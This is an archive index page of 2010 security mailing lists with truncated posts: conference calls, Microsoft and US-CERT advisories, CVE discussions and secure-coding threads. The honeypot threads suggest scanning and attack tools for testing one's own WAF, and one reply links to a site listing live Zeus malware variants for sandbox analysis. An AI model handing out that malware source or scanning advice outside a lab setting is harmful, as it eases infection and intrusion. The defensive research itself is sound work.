afternoon.

Nils

Honeypots — Discussions about tracking attackers by setting up decoy honeypots or entire honeynet networks.

nullcon Goa dwitiya (2.0) Call For Papers nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference

nullcon is an initiative by null - The open security community.

Website:
http://nullcon.net

Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.

Tracks:
---------------
- Bakkar: 1 Hr Talks
-...

[HITB-Announce] HITB2010 SIGNINT Sessions Hafez Kamal (Aug 26)
Hack In The Box is proud to announce, a brand new lightning session
called HITB SIGINT (Signal Intelligence/Interrupt)! HITB SIGINT
sessions are designed to provide a quick 15 minute overview for
material and research that's up and coming - stuff that isn't quite
ready for the mainstream tracks of the conference but deserve a mention
nonetheless. Final year students who want to present their projects to
industry experts are also strongly...

Re: honeypot needed for waf testing Valdis . Kletnieks (Aug 24)
On Mon, 23 Aug 2010 08:21:29 PDT, false said:

There's tools to do specifically that. However, you probably already have many
of the tools you need - just point stuff like nmap and nessus at your honeypot
and see if your WAF notices. If it doesn't notice you doing the nmap, it won't
notice an attacker doing the nmap. If you have hping3, try sending a few
christmas-tree packets at your honeypot, see what happens. Get a copy of
metasploit and...

honeypot needed for waf testing false (Aug 23)
I need to test my WAF. I want to set up a simple network in the lab like this:
XP or Linux client <--> WAF <--> Honeypot/test webserver

1) Does anyone have any suggestions on what I can use to simulate/generate attacks/suspicous traffic towards the
weberver from my client?

2) Is there a honeypot image out there that I can download that would be good to be the role of my test
webserver?

Any suggestions or ideas are very much...

Ruxcon 2010 Final Call For Papers cfp (Aug 20)
RUXCON 2010 FINAL CALL FOR PAPERS

Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.

This year the conference will take place over the weekend of 20th and 21st of November.

Ruxcon will be held at CQ, Melbourne, Australia.

The deadline for submissions is the 10th of October.

What is Ruxcon?

Ruxcon is the premiere technical computer security conference within Australia. Ruxcon aspires to bring...

[HITB-Ann] Reminder: HITB2010 Malaysia Call for Papers Closing August 9th Hafez Kamal (Jul 29)
This is a reminder that the Call for Papers for Asia's largest network
security event, HITBSecConf2010 - Malaysia is closing on the 9th of August!

This will be a QUAD TRACK conference featuring 2 dedicated tracks
focusing on cutting edge attack and defense techniques, a track with
dedicated hands-on lab sessions and a brand new lightning talk segment!

HITB CFP: http://cfp.hackinthebox.org/

===

Venue: Crowne Plaza Mutiara Kuala Lumpur...

[HITB-Announce] HITB Magazine Issue 003 + HITBSecConf2010 - Amsterdam Hafez Kamal (Jul 04)
Our first ever HITBSecConf in Europe is over! A big big thank you to all
our sponsors, speakers, crew, volunteers and of course attendees who
made it over to join us!!!

We're already planning for 2011 and the tentative timing for the HITB
Europe is mid May (stay tuned to our @hitbsecconf twitter stream for all
conference updates).

All conference materials from the event can be downloaded from...

CFP: Deadline Extended: SLAML'10 Mohror, Kathryn (Jun 16)
Workshop on Managing Systems via Log Analysis and Machine
Learning Techniques (SLAML '10)

=============================================
October 2-3, 2010
Vancouver, BC, Canada
(at OSDI)
http://www.usenix.org/events/slaml10/cfp/
=============================================

********...

[HITB-Announce] HITBSecConf2010 - Malaysia Call for Papers Hafez Kamal (May 19)
The Call for Papers for HITB Security Conference 2010 Malaysia is now open!

Talks that are more technical or that discuss new and never before seen
attack methods are of more interest than a subject that has been covered
several times before. Submissions are due no later than 9th August 2010.

HITB CFP: http://cfp.hackinthebox.org/

===

Date: October 11th - 14th 2010
Venue: Crowne Plaza Mutiara Kuala Lumpur

Keynote 1: Chris Wysopal...

RE: info reg Zeus bot detection and analysis Younger Tyler (May 19)
Any tips on how to selectively get infected with Zeus?

You can find the latest Zeus variants here http://www.malwaredomainlist.com/mdl.php

Tyler

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of Michele Zoerb
Sent: Wednesday, May 19, 2010 11:39 AM
To: Mayank.2.Bhatnagar; honeypot honeypot
Subject: RE: info reg Zeus bot detection and analysis

Interesting thoughts as I am just...

RE: info reg Zeus bot detection and analysis Gary Derania (May 19)
------Original Message------
From: "Michele Zoerb" <mzoerb () the41 com>
To: "Mayank.2.Bhatnagar" <MBhatnagar () ipolicynetworks com>"honeypot honeypot" <honeypots () securityfocus com>
Sent: Wed 2010-05-19 08:48
Subject: RE: info reg Zeus bot detection and analysis

Interesting thoughts as I am just starting the same type of project. I want to get infected by Zeus and perform some
analysis. I...

RE: info reg Zeus bot detection and analysis Michele Zoerb (May 19)
Interesting thoughts as I am just starting the same type of project. I want to get infected by Zeus and perform some
analysis. I have a closed environment, but didn't think that detecting a virtual environment would be an issue for the
bot. I will put my VMconverter onto a separate machine and clone from there.

Any tips on how to selectively get infected with Zeus?

Thanks,
Chele

-----Original Message-----
From: listbounce () securityfocus...

info reg Zeus bot detection and analysis Mayank.2.Bhatnagar (May 19)
Hi everyone,

We are able to collect several samples of Zeus bot and there are many variants of the same.
However when we try to analyse it in our sandbox and closed environment, we are not able to get any activity.
There are several reports available, which are for same md5sum sample but still after much of analysis and triggering
attempts, either the malicious sample dosnt trigger or if it does, it doesn't show any network activity.

What...

[HITB-Announce] HITB eZine Issue 002 out now! Hafez Kamal (Apr 23)
The second quarterly HITB eZine (issue 002) has been released! Grab your
copies from here:

https://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=35995

===

3 months ago, our newly 'reborn' ezine was a completely new experience
to our small team and we didn't expect it to have a lot of followers
considering its absence for many years. But to our surprise, we received
over 20K downloads just weeks after its...

[HITB-Announce] FINAL CALL - CFP for HITBSecConf2010 Amsterdam Hafez Kamal (Apr 08)
This is the FINAL CALL to submit your talk / presentation proposals for
the inaugural HITB Security Conference in Europe! Submissions are due
by 19TH APRIL 2010.

HITBSecConf2010 - Amsterdam takes place at the Grand Krasnapolsky from
the 29th of June till the 2nd of July (Tuesday - Friday) with keynote
speakers Anton Chuvakin and Mark Curphey in our _first ever_ QUAD TRACK
conference.

To submit your presentation proposals and for further details...

Microsoft Sec Notification — Beware that MS often uses these security bulletins as marketing propaganda to downplay serious vulnerabilities in their products—note how most have a prominent and often-misleading "mitigating factors" section.

Microsoft Security Bulletin Minor Revisions Microsoft (Sep 01)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: September 1, 2010
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS10-056 - Critical
* MS10-049 - Critical

Bulletin Information:
=====================

*...

Microsoft Security Advisory Notification Microsoft (Aug 31)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: August 31, 2010
********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (2269637)
- Title: Insecure Library Loading Could Allow Remote
Code Execution
-...

Microsoft Security Bulletin Minor Revisions Microsoft (Aug 25)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 25, 2010
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS10-056 - Critical
* MS10-054 - Critical

Bulletin Information:
=====================

*...

Microsoft Security Bulletin Minor Revision Microsoft (Aug 24)
********************************************************************
Title: Microsoft Security Bulletin Minor Revision
Issued: August 24, 2010
********************************************************************

Summary
=======
The following bulletin has undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS10-046 - Critical

Bulletin Information:
=====================

* MS10-046 - Critical

-...

Microsoft Security Advisory Notification Microsoft (Aug 23)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: August 23, 2010
********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (2269637)
- Title: Insecure Library Loading Could Allow Remote
Code Execution
-...

Microsoft Security Bulletin Minor Revisions Microsoft (Aug 18)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 18, 2010
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS10-058 - Important

Bulletin Information:
=====================

* MS10-058 - Important...

Microsoft Security Bulletin Minor Revisions Microsoft (Aug 11)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 11, 2010
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS10-060 - Critical
* MS10-057 - Important
* MS10-056 - Critical
* MS10-054 - Critical...

Microsoft Security Advisory Notification Microsoft (Aug 10)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: August 10, 2010
********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (977377)
- Title: Vulnerability in TLS/SSL Could Allow Spoofing
-...

Microsoft Security Bulletin Summary for August 2010 Microsoft (Aug 10)
********************************************************************
Microsoft Security Bulletin Summary for August 2010
Issued: August 10, 2010
********************************************************************

This bulletin summary lists security bulletins released for
August 2010.

The full version of the Microsoft Security Bulletin Summary for
August 2010 can be found at
http://www.microsoft.com/technet/security/bulletin/ms10-aug.mspx....

Microsoft Security Bulletin Advance Notification for August 2010 Microsoft (Aug 05)
********************************************************************
Microsoft Security Bulletin Advance Notification for August 2010
Issued: August 5, 2010
********************************************************************

This is an advance notification of security bulletins that
Microsoft is intending to release on August 10, 2010.

The full version of the Microsoft Security Bulletin Advance
Notification for August 2010 can be found at...

Microsoft Security Bulletin Minor Revisions Microsoft (Aug 03)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 3, 2010
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS10-046 - Critical

Bulletin Information:
=====================

* MS10-046 - Critical

-...

Microsoft Security Bulletin Summary for August 2010 Microsoft (Aug 02)
********************************************************************
Microsoft Security Bulletin Summary for August 2010
Issued: August 2, 2010
********************************************************************

This bulletin summary lists the out-of-band security bulletin
released on August 2, 2010.

The full version of the Microsoft Security Bulletin Summary for
August 2010 can be found at...

Microsoft Security Bulletin Advance Notification for August 2010 Microsoft (Jul 30)
********************************************************************
Microsoft Security Bulletin Advance Notification for August 2010
Issued: July 30, 2010
********************************************************************

This is an advance notification of one out-of-band security bulletin
that Microsoft is intending to release on August 2, 2010.

The full version of the Microsoft Security Bulletin Advance
Notification for August 2010 can be...

Microsoft Security Bulletin Minor Revision Microsoft (Jul 21)
********************************************************************
Title: Microsoft Security Bulletin Minor Revision
Issued: July 21, 2010
********************************************************************

Summary
=======
The following bulletin has undergone a minor revision increment.

* MS09-014 - Critical

Bulletin Information:
=====================

* MS09-014 - Critical

-...

Microsoft Security Advisory Notification Microsoft (Jul 20)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: July 20, 2010
********************************************************************

Security Advisory Updated Today

==============================================

* Microsoft Security Advisory (2286198)
- Title: Vulnerability in Windows Shell Could Allow
Remote Code Execution
-...

Funsec — While most security lists ban off-topic discussion, Funsec is a haven for free community discussion and enjoyment of the lighter, more humorous side of the security community

CERT Advisories — The Computer Emergency Response Team has been responding to security incidents and sharing vulnerability information since the Morris Worm hit in 1986. This archive combines their technical security alerts, tips, and current activity lists.

Current Activity - Insecure Loading of Dynamic Link Libraries in Windows Applications Current Activity (Sep 01)
US-CERT Current Activity

Insecure Loading of Dynamic Link Libraries in Windows Applications

Original release date: August 25, 2010 at 12:01 pm
Last revised: September 1, 2010 at 10:27 am

US-CERT is aware of a class of vulnerabilities related to how some
Windows applications may load external dynamic link libraries (DLLs).
When an application loads a DLL without specifying a fully qualified
path name, Windows will attempt to locate the DLL by...

Current Activity - VMware Releases Updates for ESX Service Console Packages Current Activity (Sep 01)
US-CERT Current Activity

VMware Releases Updates for ESX Service Console Packages

Original release date: September 1, 2010 at 9:32 am
Last revised: September 1, 2010 at 9:32 am

VMware has released security updates for multiple third party packages
for the ESX Service Console. These updates address vulnerabilities in
the perl, krb5, samba, tar, and cpio packages. Exploitation of these
vulnerabilities may allow an attacker to execute arbitrary...

Current Activity - RealNetworks Releases Update to Address Vulnerabilities in RealPlayer Current Activity (Aug 31)
US-CERT Current Activity

RealNetworks Releases Update to Address Vulnerabilities in RealPlayer

Original release date: August 31, 2010 at 8:23 am
Last revised: August 31, 2010 at 8:23 am

RealNetworks, Inc. has released an update for RealPlayer to address
multiple vulnerabilities. These vulnerabilities may allow a remote,
unauthenticated attacker to execute arbitrary code or obtain sensitive
information.

US-CERT encourages users and...

Current Activity - Cisco Releases Security Advisory for IOS XR Software Border Gateway Protocol Current Activity (Aug 31)
US-CERT Current Activity

Cisco Releases Security Advisory for IOS XR Software Border Gateway Protocol

Original release date: August 31, 2010 at 8:40 am
Last revised: August 31, 2010 at 8:40 am

Cisco has released a security advisory to address a vulnerability in
the Cisco IOS XR Software Border Gateway Protocol feature.
Exploitation of this vulnerability may result in the continuous
resetting of BGP peering sessions, which may cause a...

TA10-238A -- Microsoft Windows Insecurely Loads Dynamic Libraries US-CERT Technical Alerts (Aug 26)
National Cyber Alert System

Technical Cyber Security Alert TA10-238A

Microsoft Windows Insecurely Loads Dynamic Libraries

Original release date: August 26, 2010
Last revised: --
Source: US-CERT

Systems Affected

Any application running on the Microsoft Windows platform that
uses dynamically linked libraries (DLLs) may be affected. Whether
or not an application is vulnerable depends on...

Current Activity - Cisco Releases Advisories for Unified Communications Manager and Unified Presence Current Activity (Aug 25)
US-CERT Current Activity

Cisco Releases Advisories for Unified Communications Manager and Unified Presence

Original release date: August 25, 2010 at 1:53 pm
Last revised: August 25, 2010 at 1:53 pm

Cisco has released security advisories to address multiple
vulnerabilities affecting Unified Communications Manager and Unified
Presence.

These vulnerabilities affect the processing of Session Initiation
Protocol (SIP) messages. Exploitation of...

Current Activity - APWG Fax Back Phishing Education Program Current Activity (Aug 25)
US-CERT Current Activity

APWG Fax Back Phishing Education Program

Original release date: August 25, 2010 at 1:16 pm
Last revised: August 25, 2010 at 1:16 pm

In an effort to respond to a growing public threat by offline phishers
that conduct various scams via fax, the Anti-phishing Working Group
(APWG) has partnered with the Internal Revenue Service (IRS) to create
the APWG Fax Back Phishing Education Program. This program is designed
to...

Current Activity - Insecure Loading of Dynamic Link Libraries in Windows Applications Current Activity (Aug 25)
US-CERT Current Activity

Insecure Loading of Dynamic Link Libraries in Windows Applications

Original release date: August 25, 2010 at 12:01 pm
Last revised: August 25, 2010 at 12:01 pm

US-CERT is aware of a class of vulnerabilities related to how some
Windows applications may load external dynamic link libraries (DLLs).
When an application loads a DLL without specifying a fully qualified
path name, Windows will attempt to locate the DLL by...

Cyber Security Tip ST05-014 -- Real-World Warnings Keep You Safe Online US-CERT Security Tips (Aug 25)
Cyber Security Tip ST05-014
Real-World Warnings Keep You Safe Online

Many of the warning phrases you probably heard from your parents and
teachers are also applicable to using computers and the internet.

Why are these warnings important?

Like the real world, technology and the internet present dangers as well as
benefits. Equipment fails, attackers may target you, and mistakes and poor...

Current Activity - Adobe Releases Security Bulletin for Shockwave Player Current Activity (Aug 25)
US-CERT Current Activity

Adobe Releases Security Bulletin for Shockwave Player

Original release date: August 25, 2010 at 8:15 am
Last revised: August 25, 2010 at 8:15 am

Adobe has released a security update to address multiple
vulnerabilities affecting Shockwave Player 11.5.7.609 and earlier
versions. These vulnerabilities may allow an attacker to execute
arbitrary code.

US-CERT encourages users and administrators to review Adobe security...

Current Activity - Apple Releases Security Update 2010-005 Current Activity (Aug 25)
US-CERT Current Activity

Apple Releases Security Update 2010-005

Original release date: August 25, 2010 at 8:15 am
Last revised: August 25, 2010 at 8:15 am

Apple has released security update 2010-005 to address multiple
vulnerabilities affecting the ATS, CFNetwork, ClamAV, CoreGraphics,
libsecurity, PHP, and Samba applications. These vulnerabilities may
allow an attacker to execute arbitrary code, obtain sensitive
information, cause a...

Current Activity - Microsoft Releases Security Advisory Current Activity (Aug 24)
US-CERT Current Activity

Microsoft Releases Security Advisory

Original release date: August 24, 2010 at 11:42 am
Last revised: August 24, 2010 at 11:42 am

Microsoft has released a security advisory indicating that it is aware
of a remote attack vector for a class of vulnerabilities related to
how applications load external dynamic link libraries (DLLs). If an
application does not securely load DLL files, an attacker may be able
to cause the...

Current Activity - Google Releases Chrome 5.0.375.127 Current Activity (Aug 20)
US-CERT Current Activity

Google Releases Chrome 5.0.375.127

Original release date: August 20, 2010 at 8:47 am
Last revised: August 20, 2010 at 8:47 am

Google has released Chrome 5.0.375.127 for Windows, Mac, and Linux to
address multiple vulnerabilities. These vulnerabilities may allow an
attacker to execute arbitrary code, cause a denial-of-service
condition, or conduct spoofing attacks.

US-CERT encourages users and administrators to review...

TA10-231A -- Adobe Reader and Acrobat Vulnerabilities US-CERT Technical Alerts (Aug 19)
National Cyber Alert System

Technical Cyber Security Alert TA10-231A

Adobe Reader and Acrobat Vulnerabilities

Original release date: August 19, 2010
Last revised: --
Source: US-CERT

Systems Affected

* Adobe Reader 9.3.3 and earlier versions for Windows, Macintosh, and UNIX
* Adobe Acrobat 9.3.3 and earlier versions for Windows and Macintosh
* Adobe Reader 8.2.3 and earlier versions...

Current Activity - Cisco IOS Software Vulnerability Current Activity (Aug 13)
US-CERT Current Activity

Cisco IOS Software Vulnerability

Original release date: August 13, 2010 at 8:22 am
Last revised: August 13, 2010 at 8:22 am

Cisco has released a security advisory to address a vulnerability
affecting IOS Software Release 1.5.1(2)T. This vulnerability may allow
an attacker to cause a denial-of-service condition by sending a
specially crafted packet through normal network traffic.

US-CERT encourages users and...

Open Source Security — Discussion of security flaws, concepts, and practices in the Open Source community

Re: CVE id request: libc fortify source information disclosure Dan Rosenberg (Sep 02)
I retract my previous statement - you're correct that the backtrace
also can reveal this same information. Perhaps this is an acceptable
risk, since I can't think of a single real-life case where this would
have actually been useful to an attacker (although it's not too hard
to imagine such a situation). Or perhaps printing out any of this
information to unprivileged users running suid applications should be
reconsidered.

-Dan

Re: CVE id request: libc fortify source information disclosure Tomas Hoger (Sep 02)
In case of stack protector failed check, it's still an attempt to
print-out info based on what's known to be (partially) corrupted.

Re: CVE id request: libc fortify source information disclosure Dan Rosenberg (Sep 02)
Tomas,

You are correct. Both the __stack_chk_fail(), which is inserted due
to stack protection, and the more general __chk_fail(), which is
inserted due to FORTIFY_SOURCE and may trigger for static buffer
overflows in other segments, call out to the same __fortify_fail()
function to print out the stack trace.

The backtrace or memory map don't really contain any potentially
sensitive information that couldn't be obtained otherwise. It's just...

Re: CVE id request: libc fortify source information disclosure Tomas Hoger (Sep 02)
For the sake of correctness, protective technology that kicks in in the
Dan's example is stack protector, not FORTIFY_SOURCE. Though it's
probably still glibc to blame for using the same error-reporting
function in both cases.

It seems the fix would need to remove all possibly-useful info from the
error message.

CVE-2010-2960 kernel: keyctl_session_to_parent null ptr deref Eugene Teo (Sep 01)
Reported by Tavis Ormandy.

Patches (not in upstream yet):
https://bugzilla.redhat.com/show_bug.cgi?id=627440#c4
https://bugzilla.redhat.com/show_bug.cgi?id=627440#c5

You might need to comment out all the pam_keyinit calls in /etc/pam.d/
to reproduce the problem if the version of the kernel you are using is
affected.

Introduced via upstream commit ee18d64c (v2.6.32-rc1).

References:
https://bugzilla.redhat.com/CVE-2010-2960...

Re: CVE Request -- phpMyAdmin - v3.6.6 -- XSS attack using debugging messages (CVE-2010-3056 discussion) Josh Bressers (Sep 01)
Please use CVE-2010-2958

Thanks.

CVE Request -- phpMyAdmin - v3.6.6 -- XSS attack using debugging messages (CVE-2010-3056 discussion) Jan Lieskovsky (Sep 01)
Hi Steve, vendors,

on 2010-08-30 phpMyAdmin published PMASA-2010-6 addressing one XSS:
[1] http://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php

Summary (from [1]):
XSS attack using debugging messages.
Description (from [1]):
It was possible to conduct a XSS attack using error messages in PHP backtrace.

Affected versions (from [1]):
For 3.x: versions before 3.3.6 are affected.
Branch 2.11.x is not...

CVE-2010-2954 kernel: irda null ptr deref Eugene Teo (Aug 31)
Reported by Taviso Ormandy.
Patch at: http://www.spinics.net/lists/netdev/msg139404.html.
References:
https://bugzilla.redhat.com/CVE-2010-2954
http://twitter.com/taviso/status/22635752128

Quick check, introduced in 61e44b48 (v2.6.24 and above).

Thanks, Eugene

Re: CVE Request: BGP protocol vulnerability Steven M. Christey (Aug 31)
The way Cisco has written up this CVE, they are clearly focusing on the
generation of corrupted attributes, not a protocol problem. So, I'd want
a separate CVE for the general BGP design issue.

I can't quite tell the difference between CVE-2009-2055 and what Florian
is requesting a CVE for. In CVE-2009-2055, Cisco seems to be implying
that it's a problem in XR, not the design of the whole protocol - but it's
not immediately clear if they...

Re: CVE id request: libc fortify source information disclosure Steven M. Christey (Aug 31)
I think this technically qualifies as an "exposure" which is the "E" in
"CVE" - it can be used as a stepping stone for exploitation of another
vulnerability. (Very old, unwieldy definitions here:
http://cve.mitre.org/about/terminology.html)

The risk may be very minimal, but the FORTIFY_SOURCE protection mechanism
is not working "as advertised" - it can be manipulated for an
admittedly-small...

Re: CVE id request: libc fortify source information disclosure Josh Bressers (Aug 31)
----- "Nico Golde" <oss-security+ml () ngolde de> wrote:

Steve,

What is MITRE policy on this one. By itself I question if this is a
security flaw, but it also would appear to have the potential to turn a DoS
into something worse.

I'm not sure what policy is in this instance.

Thanks.

Re: CVE request: serendipity < 1.5.4 xss Josh Bressers (Aug 31)
Please use CVE-2010-2957

Thanks.

Re: [PATCH] exec argument expansion can inappropriately triggerOOM-killer Tetsuo Handa (Aug 31)
Brad Spengler wrote:

As far as I know, RHEL >= 5.3 and Asianux >= 3.2 backported this functionality.

Re: [PATCH] exec argument expansion can inappropriately trigger OOM-killer Solar Designer (Aug 31)
Brad, Roland -

Thank you for your comments and your work on this.

Agreed.

Alexander

Re: [PATCH] exec argument expansion can inappropriately trigger OOM-killer Roland McGrath (Aug 31)
This can't be so. There are already many possibilities for preemption
in the get_user_pages code paths (called from get_arg_page).

Indeed, this too is a clear indication that preemption here is already safe.

What "change"? Preemption is already possible, that's nothing new.
The only difference is that we might notice TIF_SIGPENDING having been
set, and bail out either before or after prepare_binprm, and so never
call...

Secure Coding — The Secure Coding list (SC-L) is an open forum for the discussion on developing secure applications. It is moderated by the authors of Secure Coding: Principles and Practices.

Re: Recent technical reports from the CERT Secure Coding Initiative Jonathan Leffler (Aug 23)
Thanks for the reports, Robert.

Specifications for Managed Strings, Second Edition
Hal Burch, Fred Long, Raunak Rungta, Robert C. Seacord, & David Svoboda

CMU/SEI-2010-TR-018

This report describes a managed string library for the C programming
language. [...]

cover date: May 2010

http://www.sei.cmu.edu/library/abstracts/reports/10tr018.cfm

In the managed string library report, there's a paragraph on p5 that reads:...

[OWASP] APPSEC BRAZIL 2010 - REGISTRATIONS OPEN! Leonardo Buonsanti (Aug 23)
Greetings everyone!

We're proud to announce that the OWASP's AppSec Brazil 2010 Conference
registrations' are officially open!

Early bird offers are available! Hurry up!

This year we'll have keynotes by Robert 'Rsnake' Hansen and Jeremiah
Grossman and Samy Kamkar as a Special Speaker!

Registrations are available here:
http://www.owasp.org/index.php/AppSec_Brasil_2010#tab=Registration

All info about the event can be found at:...

SB53: Richard Bejtlich Gary McGraw (Aug 23)
hi sc-l,

The 53rd (!!) monthly episode of the Silver Bullet Security Podcast is an interview with Richard Bejtlich. Richard is
a well known expert in network monitoring, a subject he has written a book about. Richard is also very knowledgeable
about software security. In fact, I wish that more ops people knew as much as Richard does about software security!
Richard now works for GE and has plenty to say about interfacing with a huge...

Building Real Software: Has Static Analysis reached its limits? Kenneth Van Wyk (Aug 20)
FYI, nice write-up on the Fortify acquisition as well as the static code analysis space here:

http://swreflections.blogspot.com/2010/08/has-static-analysis-reached-its-limits.html

Cheers,

Ken

-----
Kenneth R. van Wyk
KRvW Associates, LLC
http://www.KRvW.com

Follow us on Twitter at: http://twitter.com/KRvW_Associates

Ruxcon 2010 Final Call For Papers cfp (Aug 20)
RUXCON 2010 FINAL CALL FOR PAPERS

Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.

This year the conference will take place over the weekend of 20th and 21st of November.

Ruxcon will be held at CQ, Melbourne, Australia.

The deadline for submissions is the 10th of October.

What is Ruxcon?

Ruxcon is the premiere technical computer security conference within Australia. Ruxcon aspires to bring...

Software Security Crosses the Threshold Gary McGraw (Aug 17)
hi sc-l,

As many of you know, I have been collecting and publishing information about the software security space from a
business perspective for several years running. In 2009, revenues from tools and services companies in the software
security market exceeded $500 million. This is an important threshold for multiple reasons: the space continues to
grow even in uncertain economic times, a middle market of small and medium size businesses...

Re: Computerworld: Opinion - Making apps secure is hard work Gunnar Peterson (Aug 12)
Hi Ken,

You raise some important points. Most infosec is approached as a set of controls, but access control only takes you so
far in the face of malice.

I like this quote from G.K. Chesterton

"The real trouble with this world of ours is not that it is an unreasonable world, nor even that it is a reasonable
one. The commonest kind of trouble is that it is nearly reasonable, but not quite. Life is not an illogicality; yet it
is a trap...

Computerworld: Opinion - Making apps secure is hard work Kenneth Van Wyk (Aug 12)
I figured this was relevant here, so here's a link to my August column for Computerworld.

Excerpt:

'What's that you say? All the app vetting you've been doing to date consists only of verifying that the apps play by
the rules? That is, that they use only published APIs and such? Well, then, you really have your work cut out for you,
because that's not all that your customers expect.'

To read the complete article see:...

Secure code review/application penetration testing/security architecture positions at Cigital Joanne Gaitanis (Aug 12)
Good afternoon!

Due to rapid growth/increased client base, we are looking for Application Security Consultants (full time) at all
levels, from 1-20 years experience, from entry level to management.
If qualified and interested, send me your resume in MS WORD doc format to jgaitanis () cigital com
Peruse our website @ www.cigital.com<http://www.cigital.com> !
Must be willing to travel as needed (~25%).
Position Locations: New York City,...

Two resources Gary McGraw (Aug 09)
hi sc-l,

We just made the Richard Clarke Silver Bullet podcast transcript live. This special 50th edition of Silver Bullet
interview shows up in the July/August IEEE Security & Privacy magazine. A high definition video of the interview is
also available on the silver bullet web page. You can find a pdf copy of the transcript here:
http://www.cigital.com/silverbullet/shows/silverbullet-050-rclarke.pdf

Also of note, the mainstream...

2nd. OWASP Ibero-American Web-Applicati ons Security conference (IBWAS’10) - Call for Trai ning Carlos Serrão (Aug 01)
2nd. OWASP Ibero-American Web-Applications Security conference (IBWAS’10)
ISCTE – Lisbon University Institute
25th – 26th November 2010
Lisboa, Portugal
http://www.ibwas.com

**CALL FOR TRAINING SESSIONS**

IBWAS and OWASP is currently soliciting training proposals for the OWASP Ibero-American Web Applications Security 2010
Conference (IBWAS'10) which will take place at ISCTE-IUL, Lisboa, Portugal, on November 24 through November 26, 2010....

2nd. OWASP Ibero-American Web Applications Security Conference 2010 (IBWAS'10) - Call for Papers Carlos Serrão (Aug 01)
2nd. OWASP Ibero-American Web-Applications Security Conference 2010 (IBWAS’10)
ISCTE – Lisbon University Institute
25th – 26th November 2010
Lisboa, Portugal
http://www.ibwas.com

Call for Papers

Introduction
There is a change in the information systems development paradigm. The emergence of Web 2.0 technologies led to the
extensive deployment and use of web-based applications and web services as a way to developed new and flexible...

Re: Static code review for iPhone developers? Kenneth Van Wyk (Jul 29)
Thanks to all who responded. Great suggestions.

Most focused on the (now) built-in Clang analysis engine (and front-end for LLVM ) that Dan Cornell cited here.
(http://developer.apple.com/mac/library/featuredarticles/StaticAnalysis/index.html)

Clang looks like a useful starting point, as it looks for all sorts of common mistakes found in the C family, including
C++ and Objective C. Memory leaks, uninitialized variables, type mismatches,...

Re: Static code review for iPhone developers? Dan Cornell (Jul 29)
XCode has a built in static analysis tool, but I'm not sure how thorough it is:
<http://developer.apple.com/mac/library/featuredarticles/StaticAnalysis/index.html>

Not sure if any of the commercial folks support Objective-C yet.

Thanks,

Dan

Static code review for iPhone developers? Kenneth Van Wyk (Jul 29)
Greetings SC-L folks. Hey, I have a quick question I'd like to submit to this group.

Anyone know of any static code analysis tools that can scan an iPhone app package? Something that integrates with the
Xcode SDK and can at the very least scan through all of the Objective C in the src tree is what I'm looking for. Any
SCA product vendors currently doing this? Please contact me on or off list.

Cheers,

Ken

-----
Kenneth R. van Wyk
KRvW...

Educause Security Discussion — Securing networks and computers in an academic environment.

Re: Fwd: bit OT -- Wifi technology Barry Lynam (Sep 02)
Hi,

Can't really comment on the cisco infrastructure etc. but I'm interested in
hearing about certificate issues. Each year when the certificate expires
and requires changing, we go through a huge amount of pain testing devices
just to see how they will behave so the helpdesk knows what to expect. Do
others have same issues? Different devices with different version of code
behave differently.

We use WEP2 enterprise, 802.1x, PEAP and some...

Fwd: bit OT -- Wifi technology Russell Fulton (Sep 02)
Hi Folks

this stuff has security implications but really is not primarily a security topic so please forgive me for taking
liberties with the list.

Currently we are a cisco shop as far as our wireless infrastructure goes -- enterprise WPA2, EAP, PEAP, authenticated
via radius, but are now looking at alternatives.

One thing that we are aware of is the convergence of traditional wifi and cellphone technology. It seems clear that
'4G' will...

Re: Question about Endpoint Encryption Walter Petruska (Sep 02)
University of San Francisco has been using Utimaco's SafeGuard product for
FDE for a few years now. They've now been acquired by Sophos, whom we use
for the Endpoint Protection and Control (DLP, A/V, etc.). The two consoles
should be integrated at some point in the future- which will be a big help.
We're happy with Sophos for both the WDE and Endpoint Protection, especially
in view of the poor performance of many others in this area from a...

Re: Question about Endpoint Encryption SCHALIP, MICHAEL (Sep 02)
Actually - GuardianEdge has been purchased by Symantec - we just implemented it and it's actually working quite well!!
We like that we can interface the whole thing with Symantec/Altiris.....

In a previous life - we used Entrust, which also worked well - but it's a lot of work to get the key authority set up
right, especially if you are serving up to a nationwide customer set....

M

-----Original Message-----
From: The EDUCAUSE Security...

Re: Question about Endpoint Encryption Basgen, Brian (Sep 02)
We are also using Checkpoint. It has been a usable product that has worked for us on a fairly limited scale (250 high
risk machines), but it is not an enterprise product. They are trying to make it into an enterprise product via their
"security suite", but I think they are a few years away. That said, from the security side, I think it is one of the
better products out there. Last time we looked 2 years ago, many products out there...

Re: Question about Endpoint Encryption Jason Testart (Sep 02)
